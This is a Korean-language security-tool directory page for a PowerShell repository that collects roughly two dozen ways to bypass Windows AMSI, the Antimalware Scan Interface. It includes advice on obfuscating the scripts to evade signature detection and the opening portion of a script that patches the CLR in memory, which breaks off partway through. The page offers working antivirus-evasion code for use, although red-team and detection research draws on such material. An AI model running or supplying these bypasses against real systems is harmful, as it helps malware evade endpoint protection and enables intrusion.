Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Amsi-Bypass-Powershell — 이 리포지토리는 다양한 블로그 게시물에서 찾은 몇 가지 Amsi 우회 방법을 포함하고 있습니다. | Kitploit
도구/GitHubGitHub/s3cur3th1ssh1t/amsi-bypass-powershell
Defensive ToolsExploitationIDS/IPS EvasionRed TeamingPayload Development
GitHubs3cur3th1ssh1t/amsi-bypass-powershell

Amsi-Bypass-Powershell

이 리포지토리는 다양한 블로그 게시물에서 찾은 몇 가지 Amsi 우회 방법을 포함하고 있습니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
2.2k333671년 전Kitploit 검토 완료

후원

     

Amsi-Bypass-Powershell

이 저장소에는 여러 블로그 게시물에서 찾은 일부 AMSI(맬웨어 방지 검사 인터페이스) 우회/회피 방법이 포함되어 있습니다.

대부분의 스크립트는 AMSI 자체에 의해 탐지됩니다. 따라서 트리거를 찾아 변수/함수 이름 변경, 문자열 대체 또는 런타임 시 인코딩 및 디코딩을 통해 해당 부분의 시그니처를 변경해야 합니다. 또는 ISESteroids나 Invoke-Obfuscation을 통해 난독화하여 작동하도록 할 수도 있습니다. 또한 유효한 우회를 다시 얻기 위해 수동으로 시그니처를 변경하는 방법에 대한 블로그 게시물을 참조할 수 있습니다.

  1. clr.dll에서 AmsiScanBuffer 패치
  2. ScriptBlock 밀반입
  3. Reflection ScanContent 변경
  4. 하드웨어 중단점 사용
  5. CLR 후킹 사용
  6. Microsoft MpOav.dll의 공급자 DLL 패치
  7. 스캔 가로채기 및 공급자 함수 패치
  8. rasta-mouse의 AMSI AmsiScanBuffer 패치
  9. AMSI AmsiOpenSession 패치
  10. net webclient 사용 안 함 - 이 방법은 더 이상 작동하지 않습니다
  11. Amsi ScanBuffer 패치 출처: https://www.contextis.com/de/blog/amsi-bypass
  12. 오류 강제 발생
  13. 스크립트 로깅 비활성화
  14. Amsi Buffer 패치 - 메모리 내
  15. 6번과 동일하지만 Base64 대신 정수 바이트 사용
  16. Matt Graeber의 Reflection 방법 사용
  17. WMF5 자동 로깅 우회와 함께 Matt Graeber의 Reflection 방법 사용
  18. Matt Graeber의 두 번째 Reflection 방법 사용
  19. Cornelis de Plaa의 DLL 하이재킹 방법 사용
  20. PowerShell 버전 2 사용 - AMSI 미지원
  21. Nishang 올인원
  22. Adam Chester 패치
  23. 3번의 수정 버전 Amsi ScanBuffer - CSC.exe 컴파일 없음
  24. System.Management.Automation.dll에서 AmsiScanBuffer 주소 패치

Patching Clr

  • 설명: 메모리에서 CLR DLL 수정```powershell

Define Constants

$PAGE_READONLY = 0x02 $PAGE_READWRITE = 0x04 $PAGE_EXECUTE_READWRITE = 0x40 $PAGE_EXECUTE_READ = 0x20 $PAGE_GUARD = 0x100 $MEM_COMMIT = 0x1000 $MAX_PATH = 260

Helper functions

function IsReadable { param ($protect, $state) return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT) }

function PatternMatch { param ($buffer, $pattern, $index) for ($i = 0; $i -lt $pattern.Length; $i++) { if ($buffer[$index + $i] -ne $pattern[$i]) { return $false } } return $true }

if ($PSVersionTable.PSVersion.Major -gt 2) { # Create module builder $DynAssembly = New-Object System.Reflection.AssemblyName("Win32") $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
$MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
$SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()

# P/Invoke Methods
$TypeBuilder = $ModuleBuilder.DefineType("Win32.Kernel32", "Public, Class")
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, "kernel32.dll", [Reflection.FieldInfo[]]@($SetLastError), @($True))
도구 다운로드